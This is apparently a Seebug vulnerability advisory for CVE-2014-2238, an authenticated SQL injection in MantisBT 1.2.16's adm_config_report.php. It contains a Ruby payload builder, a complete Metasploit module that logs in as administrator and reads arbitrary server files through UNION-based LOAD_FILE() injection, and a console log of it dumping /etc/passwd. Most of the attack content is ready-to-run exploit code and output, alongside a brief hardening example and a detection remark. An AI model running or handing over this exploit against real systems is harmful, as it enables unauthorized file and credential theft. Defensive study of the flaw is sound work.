Seebug SSV:61653
History: Mar 05, 2014 - 12:00 a.m.

MantisBT 'adm_config_report.php' SQL Injection Vulnerability

2014-03-05 00:00:00
Root
www.seebug.org

EPSS: 0.005 (Low)
EPSS Percentile: 72.8%

Bugtraq ID:65903
CVE ID:CVE-2014-2238

MantisBT is a popular web-based bug tracking system.

MantisBT 'adm_config_report.php' does not properly filter user-submitted POST parameter data (the filter_config_id field), allowing a remote attacker to submit specially crafted SQL queries that can manipulate or retrieve database data. The affected page is an administrator page, so the attacker needs an authenticated administrator session; the module below logs in with administrator credentials before sending the payload, and uses MySQL's LOAD_FILE() through the injection to read arbitrary files from the database server.
Affected version: MantisBT 1.2.16

No detailed fix is currently available; see the vendor site:

http://www.mantisbt.org
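The Metasploit module further down sends the injection as one hand-encoded POST body. The following Ruby is an added example, not part of the Seebug advisory or of the Metasploit module, that breaks the technique into its parts on constructed data: building the filter_config_id payload from a file path, form-encoding the request, showing why a string-concatenated query accepts it while an integer-only check rejects it, and decoding the marker-delimited hex reply (including the NULL case where LOAD_FILE() returns nothing). The query shapes, the table name mantis_config_table, the hardened variant and the sample response are assumptions for illustration, not MantisBT's actual code or the upstream fix.

```ruby
# Added example: not from the Seebug advisory or the Metasploit module below.
# Shows the mechanics of the filter_config_id injection on constructed data.
# The query shapes and table name are assumptions, not MantisBT's real code.
require 'cgi'

# Marker strings the payload wraps around the file contents so they can be
# located in the HTML response: 0x71676a7571 = "qgjuq", 0x7169727071 = "qirpq".
PREFIX = 'qgjuq'.freeze
SUFFIX = 'qirpq'.freeze

# MySQL hex literal (0x...) for a string, so no quotes appear inside the payload.
def to_hex_literal(str)
  '0x' + str.unpack1('H*')
end

# The value injected into filter_config_id: a closing quote, a six-column
# UNION whose fifth column carries CONCAT(prefix, HEX(LOAD_FILE(path)), suffix)
# (IFNULL turns a NULL read into a single space), then '#' to comment out
# whatever follows in the original query.
def build_filter_config_id(path)
  "-7856' UNION ALL SELECT 11,11,11,11,CONCAT(#{to_hex_literal(PREFIX)}," \
    "IFNULL(CAST(HEX(LOAD_FILE(#{to_hex_literal(path)})) AS CHAR),0x20)," \
    "#{to_hex_literal(SUFFIX)}),11#"
end

# Form-encode the complete POST body as the module sends it.
def build_post_body(path)
  params = {
    'save' => '1',
    'filter_user_id' => '0',
    'filter_project_id' => '0',
    'filter_config_id' => build_filter_config_id(path),
    'apply_filter_button' => 'Apply Filter'
  }
  params.map { |k, v| "#{CGI.escape(k)}=#{CGI.escape(v)}" }.join('&')
end

# Assumed shape of a vulnerable query: the parameter is quoted and
# concatenated, so the payload's leading quote ends the literal and the
# UNION becomes part of the statement.
def vulnerable_query(filter_config_id)
  "SELECT * FROM mantis_config_table WHERE config_id = '#{filter_config_id}'"
end

# Assumed hardened shape (illustrative, not the upstream patch): refuse anything
# that is not an integer literal before it reaches the SQL string.
def safe_query(filter_config_id)
  id = Integer(filter_config_id.to_s, 10) # ArgumentError on "-7856' UNION ..."
  "SELECT * FROM mantis_config_table WHERE config_id = #{id}"
end

# Recover the file from a response body. Returns nil when the markers are
# missing (login failed, target patched) or when LOAD_FILE returned NULL
# (file absent or no FILE privilege), in which case only the 0x20 space sits
# between the markers instead of hex.
def decode_loadfile_response(body)
  m = body.match(/#{PREFIX}(.*?)#{SUFFIX}/m)
  return nil unless m
  hex = m[1]
  return nil unless hex.match?(/\A(?:[0-9A-Fa-f]{2})+\z/)
  [hex].pack('H*')
end

# Constructed response fragment: the first line of a passwd file, hex-encoded
# between the markers as the injected CONCAT would return it.
SAMPLE_RESPONSE = '<td>qgjuq726F6F743A783A303A303A726F6F743A2F726F6F743A2F62696E2F626173680Aqirpq</td>'.freeze

if __FILE__ == $PROGRAM_NAME
  puts build_post_body('/etc/passwd')
  puts vulnerable_query(build_filter_config_id('/etc/passwd'))
  p decode_loadfile_response(SAMPLE_RESPONSE)
  begin
    safe_query(build_filter_config_id('/etc/passwd'))
  rescue ArgumentError => e
    puts "hardened query rejected the payload: #{e.message}"
  end
end
```

build_post_body('/etc/passwd') reproduces byte for byte the 'data' string the module posts, which is a quick way to confirm what a WAF or proxy log of this attack would show: a non-numeric filter_config_id containing %27 (the closing quote) followed by UNION ALL SELECT.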


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MantisBT Admin SQL Injection Arbitrary File Read",
      'Description'    => %q{
        MantisBT 1.2.16 does not properly sanitize the filter_config_id POST
        parameter of adm_config_report.php. Given valid administrator
        credentials, this module logs in and uses a UNION-based injection
        with MySQL's LOAD_FILE() to read a file from the database server.
        The file is returned hex-encoded between two marker strings so it
        can be extracted from the HTML response.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
        ],
      'References'     =>
        [
          ['CVE', '2014-2238'],
          ['BID', '65903']
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 28 2014"))

    register_options(
      [
        OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']),
        OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Single password', 'password']),
        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
      ], self.class)
  end

  def run
    # Authenticate first: adm_config_report.php is an administrator page, so
    # the injection is only reachable with a privileged session cookie.
    post = {
      'return' => 'index.php',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'secure_session' => 'on'
    }

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/login.php'),
      'method' => 'POST',
      'vars_post' => post
    })

    if resp.nil?
      print_error("No response from #{rhost}:#{rport} during login")
      return
    end

    cookie = resp.get_cookies

    # LOAD_FILE() receives the path as a MySQL hex literal (0x...), so no
    # quotes are needed inside the injected string.
    filepath = datastore['FILE'].unpack("H*")[0]

    # Injected into filter_config_id: closes the quoted value, appends a
    # six-column UNION whose fifth column is
    # CONCAT('qgjuq', HEX(LOAD_FILE(<path>)), 'qirpq') with the markers as
    # hex literals 0x71676a7571 / 0x7169727071, and comments out the rest
    # of the original query with '#'.
    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
      'method' => 'POST',
      'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter",
      'cookie' => cookie,
    })

    if resp.nil?
      print_error("No response from adm_config_report.php")
      return
    end

    # The file comes back hex-encoded between the two markers. No hex between
    # them usually means the login failed, the target is patched, or
    # LOAD_FILE() returned NULL (file missing or no FILE privilege), in which
    # case the IFNULL fallback leaves only a space there.
    unless resp.body =~ /qgjuq([0-9A-Fa-f]+)qirpq/
      print_error("Could not find the file contents in the response")
      return
    end

    file = [$1].pack("H*")
    print_good(file)
  end
end

__END__
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


       =[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1178 exploits - 649 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > use auxiliary/gather/mantisbt_admin_sqli 
msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109
RHOST => 172.31.16.109
msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/
TARGETURI => /mantisbt-1.2.16/
msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password
PASSWORD => password
msf auxiliary(mantisbt_admin_sqli) > show options

Module options (auxiliary/gather/mantisbt_admin_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   FILE       /etc/passwd        yes       Path to remote file
   PASSWORD   password           yes       Single password
   Proxies                       no        Use a proxy chain
   RHOST      172.31.16.109      yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /mantisbt-1.2.16/  yes       Relative URI of MantisBT installation
   USERNAME   administrator      yes       Single username
   VHOST                         no        HTTP server virtual host

msf auxiliary(mantisbt_admin_sqli) > run

[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false
whoopsie:x:106:114::/nonexistent:/bin/false
avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false
saned:x:112:122::/home/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false

[*] Auxiliary module execution completed
msf auxiliary(mantisbt_admin_sqli) >